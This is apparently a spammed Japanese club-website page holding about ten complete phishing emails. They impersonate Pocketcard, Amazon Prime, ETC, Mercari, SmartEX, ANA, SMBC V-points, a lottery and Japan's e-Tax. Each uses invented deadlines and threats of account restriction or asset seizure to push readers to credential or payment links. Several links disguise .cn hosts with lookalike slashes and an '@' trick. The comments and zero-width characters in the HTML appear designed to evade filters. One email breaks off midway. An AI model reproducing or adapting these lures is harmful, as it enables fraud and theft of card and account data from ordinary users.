331-B地区クラブホームーページ一覧
331-B サイト
http://huat.jp/331b-website

__【要対応】ご利用カードの確認手続きをお願いします

<!-- UltraClean Pocketcard v1 | 完全異構DOM + ボタン再構築 --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
font-family: "Meiryo", sans-serif;
background: #eef1f4;
color: #222;
font-size: 15px;
line-height: 1.8;
}
.outer {
max-width: 700px;
margin: 20px auto;
background: #fff;
border: 1px solid #ccc;
border-radius: 10px;
box-shadow: 0 0 6px rgba(0,0,0,0.04);
overflow: hidden;
}
.topbar {
background: #004b91;
color: #fff;
padding: 20px;
font-size: 18px;
font-weight: bold;
text-align: center;
}
.info {
background: #f7f9fc;
padding: 12px 24px;
font-size: 13px;
color: #444;
}
.content {
padding: 28px 30px;
}
.content p {
margin: 14px 0;
}
.alert-box {
background: #e6f3ff;
border-left: 5px solid #0077c2;
padding: 16px;
border-radius: 4px;
margin: 24px 0;
font-size: 14px;
}
.cta-box {
text-align: center;
margin: 36px 0;
}
.cta-button {
background: #005bac;
color: #fff;
padding: 14px 32px;
font-weight: bold;
font-size: 15px;
border-radius: 999px;
text-decoration: none;
display: inline-block;
transition: background 0.3s ease;
}
.cta-button:hover {
background: #0072cc;
}
.note-block {
background: #f5f5f5;
font-size: 13px;
padding: 20px 24px;
text-align: center;
color: #666;
border-top: 1px solid #ccc;
}
@media screen and (max-width: 600px) {
.content {
padding: 20px;
}
.cta-button {
width: 92%;
box-sizing: border-box;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=outer>
<DIV class=topbar>Pocketcard セキュリティセンターからのお知らせ</DIV>
<DIV class=info>通知番号:PC-2026-01-23 / お客様番号:****68324</DIV>
<DIV class=content>
<P><STRONG>アカウントの再認証をお願いいたします。</STRONG></P>
<P style="writing-mode:horizontal-tb;">いつも Pocketcard をご利用いただきありがとうございます。</P>
<P style="perspective:none;">システムによるセキュリティチェックの結果、現在お客様アカウントにて再認証が必要と判定されました。</P>
<DIV class=alert-box><STRONG>▼
再認証の手順</STRONG><BR>・下記のボタンよりログインページにアクセスしてください。<BR>・案内に従って、必要な情報をご入力ください。<BR><BR><STRONG>※</STRONG>
本通知から48時間以内に手続きが行われない場合、一部機能が制限される可能性があります。 </DIV>
<DIV class=cta-box><A class=cta-button
href="https://royviupg.com∕URHQijpC∕sPLPci∕lbhTyw@mlrtddl.cn/dqafqm.co.jp"
target=_blank>今すぐ認証する</A> </DIV></DIV>
<DIV
class=note-block>※このメールはご本人によるご利用を前提に自動送信されています。<BR>万が一お心当たりがない場合は、ログイン後「お客様情報の確認・変更」よりご対応ください。<BR><BR>本メールは配信専用アドレスから送信されています。返信には対応しておりません。<BR><BR>ご不明点は
Pocketcard カスタマーセンターまでお問い合わせください。<BR><BR>© 2025 Pocketcard Inc. All Rights
Reserved. </DIV></DIV></BODY></HTML>

<重要>Amazon_Prime会員の満期通知(自動配信)---番号46005py

Amazon Prime 月額料金に関するお知らせ‌⁣⁠‍‌⁣⁠‍。

Amazon Prime をご利用いただきありがとうございます⁣⁠‍‌⁣⁠‍。

登録中のお支払い方法にて、Prime 月額料金の請求が正常に完了しなかったため、現在未払いの状態となっております。

■ 未払いの Prime 月額料金
600円

■ 確認手順
Prime 会員特典を引き続きご利用いただくため、お支払い方法の確認・更新をお願いいたします。

https://mmob63i2rwza9wxzok.s3.af-south-1.amazonaws.com/ZukOZwGiPO

カード会社の承認状況により、請求が完了しない場合があります。

未払いの状態が続いた場合、Prime 会員特典の一部が制限される可能性があります。

※本メールは送信専用です。ご返信いただいても対応できません。

__【重要なお知らせ】ETC利用料金のご返金について

<!-- UltraClean ETC Refund v1 | DOM再構成 + Official Layout --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
font-family: "Meiryo", sans-serif;
background: #f5f7fa;
color: #222;
font-size: 15px;
line-height: 1.7;
}
.container {
max-width: 700px;
margin: 30px auto;
background: #ffffff;
border-radius: 10px;
box-shadow: 0 1px 6px rgba(0,0,0,0.05);
overflow: hidden;
}
.header {
background: #005bac;
color: #fff;
padding: 20px 24px;
font-size: 18px;
font-weight: bold;
}
.section {
padding: 26px 30px;
}
.section p {
margin: 14px 0;
}
.cta-wrap {
text-align: center;
margin: 30px 0;
}
.cta-button {
background: #e60012;
color: #fff;
font-weight: bold;
font-size: 15px;
text-decoration: none;
padding: 14px 32px;
border-radius: 40px;
display: inline-block;
transition: all 0.3s ease;
}
.cta-button:hover {
background: #ba0010;
}
.footnote {
font-size: 13px;
color: #666;
text-align: center;
padding: 20px;
background: #f1f1f1;
border-top: 1px solid #ccc;
line-height: 1.6;
}
@media screen and (max-width: 600px) {
.section {
padding: 20px 16px;
font-size: 14px;
}
.cta-button {
width: 100%;
box-sizing: border-box;
padding: 14px 0;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=container>
<DIV class=header>ETC利用照会サービス|返金のお手続きについて</DIV>
<DIV class=section>
<P>平素よりETCサービスをご利用いただき、誠にありがとうございます。</P>
<P>一部のご利用において、過剰請求が発生していたことが確認されました。</P>
<P>以下のリンクより返金手続きをお願いいたします。期限内にお手続きがない場合、返金は無効となる可能性がございます。</P>
<P>皆さまにはご不便をおかけし誠に申し訳ございませんが、何卒ご理解のほどよろしくお願い申し上げます。</P>
<DIV class=cta-wrap><A class=cta-button
href="https://netswbknui.com∕uNgvMqClu∕DbKzBcYS∕uZnvrevl@csegzto.cn/sltcv.co.jp"
target=_blank>返金手続きはこちら</A> </DIV>
<P style="appearance:normal;">※ 本メールは自動送信されています。ご不明点は公式サイトよりご確認ください。</P></DIV>
<DIV class=footnote>© ETC利用照会サービス運営センター<BR>本メールに心当たりがない場合は破棄してください。
</DIV></DIV></BODY></HTML>

【メルカリ】本人確認情報の確認依頼【331b-hp】

<!DOCTYPE html>
<html lang="ja">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>【メルカリ】本人確認の再実施に関する重要なお知らせ</title>
</head>

<body style="margin:0;padding:0;background-color:#fafafa;font-family:Hiragino Kaku Gothic Pro,Meiryo,sans-serif;">

<table width="100%" cellpadding="0" cellspacing="0" border="0" bgcolor="#fafafa">
<tr>
<td align="center">

<!-- Main Container -->
<table width="560" cellpadding="0" cellspacing="0" border="0" bgcolor="#ffffff" style="max-width:560px;width:100%;">

<!-- Header -->
<tr>
<td style="padding:16px;">
<img src="https://braze-images.com/appboy/communication/assets/image_assets/images/639bed6d11fb1b300f0d190e/original.png?1671163245"
alt="mercari"
width="528"
style="display:block;width:100%;height:auto;border:0;">
</td>
</tr>

<!-- Content -->
<tr>
<td style="padding:0 16px 10px;color:#222222;font-size:15px;line-height:1.75;">

<h1 style="margin:0 0 20px;color:#ea260e;font-size:19px;font-weight:bold;">
本人確認の再実施に関する重要なお知らせ
</h1>

<p style="margin:0 0 14px;">
いつもメルカリをご利用いただきありがとうございます。
</p>

<p style="margin:0 0 14px;">
メルカリの安全対策により、<br>
<strong>お客さまのアカウントで追加の本人確認が必要となりました。</strong><br>
以下の期限までに確認手続きを完了してください。
</p>

</td>
</tr>

<!-- Alert Box -->
<tr>
<td style="padding:0 16px 10px;">
<table width="100%" cellpadding="0" cellspacing="0" border="0"
style="background-color:#fff4f4;border:1px solid #ff8b8b;border-radius:8px;">
<tr>
<td style="padding:16px;font-size:15px;line-height:1.6;">
<strong style="color:#ea260e;">
【実施期限:2026年01月20日(日)23:59】
</strong><br>
期限までに完了いただけない場合、
<strong>出品・購入・振込申請など一部機能がご利用いただけなくなります。</strong>
</td>
</tr>
</table>
</td>
</tr>

<!-- Button -->
<tr>
<td align="center" style="padding:16px;">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td bgcolor="#ea260e" style="border-radius:8px;">
<a href="https://mri.freshlogin.cfd/v5/hiung/mrilogin?track=5185415852256"
style="display:inline-block;padding:15px 28px;
font-size:17px;font-weight:bold;
color:#ffffff;text-decoration:none;
border-radius:8px;">
本人確認を行う
</a>
</td>
</tr>
</table>
</td>
</tr>

<!-- Note -->
<tr>
<td style="padding:0 16px 20px;">
<table width="100%" cellpadding="0" cellspacing="0" border="0"
style="background-color:#f9f9f9;border-radius:6px;">
<tr>
<td style="padding:14px;font-size:13.5px;color:#555555;line-height:1.6;">
※確認手続きには数分ほどかかる場合があります。完了後は、各種サービスを通常どおりご利用いただけます。
</td>
</tr>
</table>
</td>
</tr>

<!-- Footer Text -->
<tr>
<td style="padding:0 16px 20px;font-size:12.5px;color:#888888;line-height:1.6;">
本メールは送信専用アドレスから配信しています。<br>
ご不明点はアプリ内「マイページ → ヘルプ・お問い合わせ」よりご連絡ください。
</td>
</tr>

</table>

<!-- Footer -->
<table width="560" cellpadding="0" cellspacing="0" border="0"
style="max-width:560px;width:100%;background-color:#f5f5f5;">
<tr>
<td style="padding:24px;text-align:left;">

<img src="https://braze-images.com/appboy/communication/assets/image_assets/images/6385a546a2604c0bf4567525/original.png?1669702982"
width="95"
style="display:block;margin-bottom:14px;border:0;">

<p style="margin:0;font-size:12px;color:#666666;">
株式会社メルカリ
</p>
<p style="margin:4px 0 0;font-size:12px;color:#666666;">
〒106-6118 東京都港区六本木6-10-1 六本木ヒルズ森タワー
</p>
<p style="margin:14px 0 0;font-size:10px;color:#666666;">
©2025 Mercari, Inc.
</p>

</td>
</tr>
</table>

</td>
</tr>
</table>

</body>
</html>

__【会員様各位】不正利用防止のため速やかな対応をお願いしますVF=764798268161

<!-- UltraClean SmartEX v1 | 完全新DOM構造 + Official感 + Button変化 --><HTML
lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
font-family: "Meiryo", sans-serif;
background-color: #e5eaf0;
color: #2b2b2b;
font-size: 15px;
line-height: 1.8;
}
.frame {
max-width: 680px;
margin: 40px auto;
background: #ffffff;
border-radius: 10px;
box-shadow: 0 1px 8px rgba(0,0,0,0.05);
overflow: hidden;
}
.header {
background-color: #004e9a;
color: #ffffff;
padding: 22px 26px;
font-size: 18px;
font-weight: bold;
text-align: center;
}
.body {
padding: 26px 28px;
}
.body p {
margin: 14px 0;
}
.ticket-box {
background: #f2f7fb;
border: 1px solid #b3d7f0;
padding: 18px;
border-radius: 6px;
font-size: 14px;
margin: 24px 0;
}
.cta-wrap {
text-align: center;
margin: 32px 0;
}
.cta-wrap a {
background: #004e9a;
color: #fff;
font-weight: bold;
padding: 14px 34px;
text-decoration: none;
border-radius: 30px;
display: inline-block;
transition: background 0.3s ease;
font-size: 15px;
}
.cta-wrap a:hover {
background: #003366;
}
.footer {
font-size: 12px;
color: #666;
background: #f1f1f1;
padding: 20px 26px;
line-height: 1.6;
border-top: 1px solid #ccc;
}
@media screen and (max-width: 600px) {
.body {
padding: 20px 16px;
}
.cta-wrap a {
width: 92%;
padding: 14px 0;
box-sizing: border-box;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=frame>
<DIV class=header>【重要】スマートEX ご予約内容のご確認</DIV>
<DIV class=body>
<P style="right:auto;">平素よりスマートEXをご利用いただき、誠にありがとうございます。</P>
<P style="max-width:none;">以下のご予約において、セキュリティ監視システムにより不正利用の可能性が検出されました。</P>
<DIV class=ticket-box><STRONG>■
ご予約内容</STRONG><BR>お預かり番号:052179<BR>乗車日:2026-01-23<BR>区間:東京 →
新大阪<BR>乗車人数:おとな6名<BR>座席:スマートEX自由席<BR>発売額:81,589円 </DIV>
<P style="break-after:auto;">このご予約は、<STRONG style="COLOR: #c00">一時的に停止</STRONG>されております。</P>
<P style="border-style:none;">ご本人様によるお手続きが確認できない場合、自動的にキャンセルとなる可能性がございます。</P>
<P>お心当たりがない場合は、以下のリンクより会員情報の確認をお願いいたします。</P>
<DIV class=cta-wrap><A
href="https://nscnt.com∕wLmqHci∕OTuQNhtmm∕UCTbfsPF@kkfzqik.cn/ioezj.co.jp"
target=_blank>確認手続きはこちら</A> </DIV>
<P style="background-blend-mode:normal;">お忙しい中恐縮ですが、何卒よろしくお願い申し上げます。</P></DIV>
<DIV
class=footer>※本メールは送信専用です。返信いただいても対応できません。<BR>※24時間以内にご確認いただけない場合、ご予約はキャンセルされる可能性があります。<BR>©
2025 SmartEX Inc. All rights reserved. </DIV></DIV></BODY></HTML>

__重要なお知らせ:ANAマイレージクラブのマイル加算手続き。

<HTML lang=ja><HEAD><TITLE>ANAマイル有効期限のお知らせ</TITLE>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body { margin:0; padding:0; font-family:"Meiryo",sans-serif; background:#f3f6f9; color:#1d1d1d; }
.main-outer { max-width:700px; margin:auto; background:#fff; border-radius:10px; overflow:hidden; box-shadow:0 0 6px rgba(0,0,0,0.05); }
.headline-bar { background:#005bac; padding:18px 22px; color:#fff; font-size:16px; font-weight:bold; text-align:center; }
.main-content { padding:24px 26px; font-size:14px; line-height:1.8; }
.notice-block { background:#e6f2fc; border-left:5px solid #0072ce; padding:14px 20px; margin:20px 0; color:#003366; font-weight:bold; border-radius:6px; }
.paragraph { margin:12px 0; }
.blue-btn-area { background:#f9f9f9; padding:28px 20px; text-align:center; }
.btn-wrap { display:inline-block; background:#0074c2; border-radius:32px; border:1px solid #005ea6; }
.btn-wrap a { display:block; padding:14px 36px; color:#fff; font-weight:bold; text-decoration:none; font-size:15px; }
.btn-wrap a:hover { background:#005ba1; }
.section-note { font-size:13px; color:#444; padding:20px 26px; border-top:1px solid #ccc; }
.section-note ul { padding-left:18px; margin-top:8px; margin-bottom:0; }
.footer-copy { text-align:center; background:#f2f2f2; font-size:11px; color:#888; padding:16px 12px; border-top:1px solid #e0e0e0; }
@media screen and (max-width: 600px) {
.main-content, .section-note { padding:18px 14px; }
.btn-wrap a { width:100%; padding:16px 0; box-sizing:border-box; }
}
</STYLE>

</HEAD>
<BODY>
<DIV class=main-outer>
<DIV class=headline-bar>ANAマイレージクラブ - マイル有効期限のご案内</DIV>
<DIV class=main-content>
<P class=paragraph>日頃よりANAマイレージクラブをご愛顧いただき、誠にありがとうございます。</P>
<P class=paragraph>2026-01-23までに有効期限を迎えるマイルがございます。</P>
<DIV class=notice-block>有効期限切れ予定マイル:<STRONG>5,122マイル</STRONG></DIV>
<P class=paragraph>マイルは航空券、ショッピング、ギフト券など、さまざまな用途でご活用いただけます。</P>
<P class=paragraph>ぜひ下記リンクより詳細をご確認ください。</P></DIV>
<DIV class=blue-btn-area>
<DIV class=btn-wrap><A
href="https://pxfrpra.com∕BBhYJOB∕iRVtbFCrp∕IqxPHm@kbvzcmk.cn/dnrnj.co.jp">マイルを利用する
</A></DIV></DIV>
<DIV class=main-content>
<P>ご確認がない場合、マイルが失効となる可能性がございますので予めご了承ください。</P></DIV>
<DIV class=section-note><STRONG>【マイルのご利用例】</STRONG>
<UL>
<LI>特典航空券への交換
<LI>ANAショッピング A-style での利用
<LI>提携ポイントやギフト券への交換 </LI></UL><BR><STRONG>【ご注意事項】</STRONG>
<UL>
<LI>有効期限を過ぎたマイルは失効いたします。
<LI>記載内容は2025年10月時点の情報です。 </LI></UL></DIV>
<DIV class=footer-copy>© 2025 All Nippon Airways Co., Ltd. All Rights Reserved.
</DIV></DIV></BODY></HTML>

ETCサービス:料金確認のお願い


平素よりETC利用照会サービスをご利用いただき、誠にありがとうございます。
お客様のご利用において、一部のご利用料金に未決済の状態が確認されました。つきましては、以下の内容をご確認のうえ、必要なお手続きをお願いいたします。
■ ご確認内容
対象期間:最新のご利用分
状況:お支払い手続きが未完了
対応期限:本メール受信後24時間以内
ご利用明細を確認する
※期限を過ぎた場合、システム側で一時的な制限がかかる場合がございます。



NEXCO西日本/ETC利用照会サービスセンター

※本メールは送信専用です。ご返信いただいても対応いたしかねます。

【重要】Vポイント有効期限が迫っています|お早めにご利用くださいNo.344191

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML lang=ja svg="http://www.w3.org/2000/svg" 2000 www.w3.org http:
XMLNS:[default] XMLNS:[default] http://www.w3.org/2000/svg =
"http://www.w3.org/2000/svg"><HEAD>
<META content="text/html; charset=utf-8" http-equiv=Content-Type>
<META name=GENERATOR content="MSHTML 11.00.10570.1001"></HEAD>
<BODY>
<P data-end="144" data-start="108"><STRONG data-end="144"
data-start="108">【重要】Vポイント有効期限が迫っています|お早めにご利用ください</STRONG></P>
<P data-end="177" data-start="146">いつも三井住友カードをご利用いただきありがとうございます。</P>
<P data-end="253" data-start="179">お客様がお持ちの <STRONG data-end="216"
data-start="188">Vポイントの一部が、まもなく有効期限を迎えます。</STRONG><BR data-end="219"
data-start="216">有効期限を過ぎると、未使用分のポイントは自動的に失効いたします。</P>
<P data-end="303" data-start="255">────────────────────<BR data-end="278"
data-start="275">■ 失効予定ポイント数<BR data-end="292" data-start="289"><FONT
color=red>8,860ポイント</FONT></P>
<P data-end="328" data-start="305">■ 失効予定日<BR data-end="315"
data-start="312"><FONT color=red>2026年01月24日</FONT></P>
<P data-end="380" data-start="330">────────────────────<BR data-end="353"
data-start="350">Vポイントは、以下の特典にすぐご利用いただけます。</P>
<P data-end="514" data-start="382">・現金キャッシュバック(口座振込・請求金額からの減額)<BR data-end="412"
data-start="409">・Amazonギフト券・Google Play・App Store &amp; iTunes ギフトコード<BR
data-end="464" data-start="461">・ANAマイル・Tポイント・楽天ポイント など各種提携先ポイント<BR
data-end="499" data-start="496">・各種電子マネーや商品交換</P>
<P data-end="574" data-start="516">

__【抽選不要】ジャンボ宝くじ22枚を全員に無料でプレゼント中

<!-- NOTE: Loto-style v1 新構造テンプレート --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=format-detection content=telephone=no>
<META name=color-scheme content="light only">
<STYLE>
body {
margin: 0;
padding: 0;
background: #f4f4f4;
font-family: "Meiryo", sans-serif;
color: #222;
}
.wrap {
max-width: 680px;
margin: auto;
background: #fff;
border-radius: 8px;
overflow: hidden;
box-shadow: 0 0 6px rgba(0,0,0,0.08);
}
.head {
background: #9e0038;
color: #fff;
text-align: center;
padding: 20px;
font-size: 18px;
font-weight: bold;
}
.content {
padding: 24px;
}
.content h1 {
font-size: 17px;
color: #9e0038;
margin: 0 0 14px;
}
.content p {
font-size: 15px;
margin: 10px 0;
line-height: 1.7;
}
.box {
background: #fff8f8;
border-left: 4px solid #9e0038;
padding: 16px;
margin: 18px 0;
}
.cta {
display: flex;
justify-content: center;
padding: 30px 0;
}
.cta a {
display: block;
text-align: center;
border: 2px solid #9e0038;
color: #9e0038;
font-weight: bold;
text-decoration: none;
padding: 14px 24px;
border-radius: 28px;
font-size: 16px;
width: 90%;
max-width: 320px;
transition: 0.3s;
}
.cta a:hover {
background: #9e0038;
color: #fff;
}
.foot {
background: #efefef;
font-size: 12px;
text-align: center;
color: #666;
padding: 16px;
border-top: 1px solid #ccc;
}
@media (max-width: 600px) {
.content {
padding: 18px;
}
.cta a {
font-size: 17px;
padding: 16px;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=wrap>
<DIV class=head>【宝くじ公式サイト】特別キャンペーンのお知らせ</DIV>
<DIV class=content>
<H1>日頃のご愛顧に感謝を込めて</H1>
<P style="writing-mode:horizontal-tb;">いつも宝くじ公式サイトをご利用いただき、誠にありがとうございます。</P>
<P style="line-height:normal;">ただいま<EM>特別キャンペーン</EM>を期間限定で開催中です。</P>
<DIV class=box>
<P><STRONG>■ プレゼント内容:</STRONG><BR>ハロウィンジャンボ宝くじ
22枚(連番11枚+バラ11枚)<BR><STRONG>価格:</STRONG>6,600円相当</P>
<P><STRONG>■ 対象者:</STRONG> 宝くじ公式サイト会員</P>
<P style="background-clip:border-box;"><STRONG>■ 応募期限:</STRONG> このメール受信から <STRONG>3日以内</STRONG></P></DIV>
<P style="font-style:normal;">キャンペーンの詳細は以下よりご確認ください。</P></DIV>
<DIV class=cta><A
href="https://eqksnyne.com∕iwGcjbKUaD∕MIrlTWGHEV∕ugTDSdApb∕mzWTPDxWMu∕RcadLVw@RaDcqczi.mhbfjzh.cn">キャンペーンに申し込む</A>
</DIV>
<DIV class=foot>本メールは送信専用です。お問い合わせは公式サイトよりお願いいたします。<BR>© 2025 宝くじ公式サイト All
rights reserved. </DIV></DIV></BODY></HTML>

【納税のお願い】未納が発生しています

<!-- NOTE: e-Tax Ultra v2 | New DOM Hash | Unused Layout --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=format-detection content=telephone=no>
<META name=color-scheme content="light only">
<STYLE>
body {
margin: 0;
padding: 0;
background: #f2f5f9;
font-family: "Hiragino Kaku Gothic ProN", Meiryo, sans-serif;
color: #222;
font-size: 15px;
line-height: 1.8;
}
.frame {
max-width: 700px;
margin: 0 auto;
background: #fff;
border: 1px solid #dcdcdc;
border-radius: 10px;
overflow: hidden;
}
.bar-top {
background: #003366;
color: #fff;
padding: 22px 20px;
font-size: 17px;
font-weight: bold;
text-align: center;
}
.section {
padding: 26px 30px;
}
.section p {
margin: 12px 0;
}
.notice {
background: #fff5f5;
border-left: 5px solid #b71c1c;
padding: 18px;
margin: 20px 0;
border-radius: 4px;
}
.info-list {
background: #f0f4f8;
padding: 20px;
border: 1px solid #ccd3db;
border-radius: 5px;
}
.info-list ul {
margin: 0;
padding-left: 20px;
}
.info-list li {
margin-bottom: 8px;
}
.jump {
display: flex;
justify-content: center;
margin: 30px 0;
}
.jump a {
display: inline-block;
padding: 12px 34px;
border: 2px solid #003366;
color: #003366;
text-decoration: none;
font-weight: bold;
border-radius: 32px;
transition: 0.3s;
}
.jump a:hover {
background: #003366;
color: #fff;
}
.support {
font-size: 13px;
color: #444;
padding-top: 10px;
}
.footer {
font-size: 12px;
color: #666;
background: #f9f9f9;
padding: 22px;
border-top: 1px solid #ccc;
}
@media screen and (max-width: 600px) {
.section {
padding: 20px;
}
.jump a {
width: 90%;
box-sizing: border-box;
font-size: 16px;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=frame>
<DIV class=bar-top>【e-Tax】税金未納に関する重要なお知らせ</DIV>
<DIV class=section>
<P>e-Taxをご利用いただき、誠にありがとうございます。</P>
<P>下記の日付に関して、所得税または延滞金(法律に基づき算出されたもの)のお支払いが確認できておりません。</P>
<P style="border-radius:0;">これまで自主的な納付をお願いしてまいりましたが、現時点で未納の状態が継続しております。</P>
<DIV
class=notice>このまま最終期限までに納付がない場合、<BR>不動産・自動車等の登録財産や給与・売掛金等の債権に対する差押処分が実施される可能性がございます。
</DIV>
<DIV class=info-list>
<UL>
<LI><STRONG>納付期限:</STRONG>2025年11月20日
<LI><STRONG>最終期限:</STRONG>2025年12月30日(※延長不可) </LI></UL></DIV>
<DIV class=jump><A
href="https://melmdtly.com∕QUdMmRjMjw∕iYhiwwW∕QZluVpOJxp∕WFHIvF∕bXCDXXoo@acCJYlQlV.jtapio.cn">お支払いへ進む</A>
</DIV>
<DIV class=support>※
本メールは、【e-Tax】国税電子申告・納税システムにご登録いただいた方へ配信しております。<BR>このメールアドレスは送信専用のため、ご返信には対応しておりません。
</DIV></DIV>
<DIV class=footer>ご不明な点がございましたら、以下までお問い合わせください。<BR><BR>カスタマーサポート:<BR>メールアドレス:<A
href="mailto:info@ntago.jp">info@ntago.jp</A><BR>電話番号:03-6680-3000<BR><BR>国税庁<BR>〒100-8978
東京都千代田区霞が関3-1-1<BR>法人番号:7000012050002<BR><BR>Copyright © TAX AGENCY All Rights
Reserved.<BR>このメールは自動生成されたものです。ご返信には対応しておりません。 </DIV></DIV></BODY></HTML>

書込


RSS Feed331-B地区HP一覧 RSS Feed

Total Access : 319,137 (Today : 968 / Yesterday : 751)

読者メール登録:

http://huat.jp/331b-hp/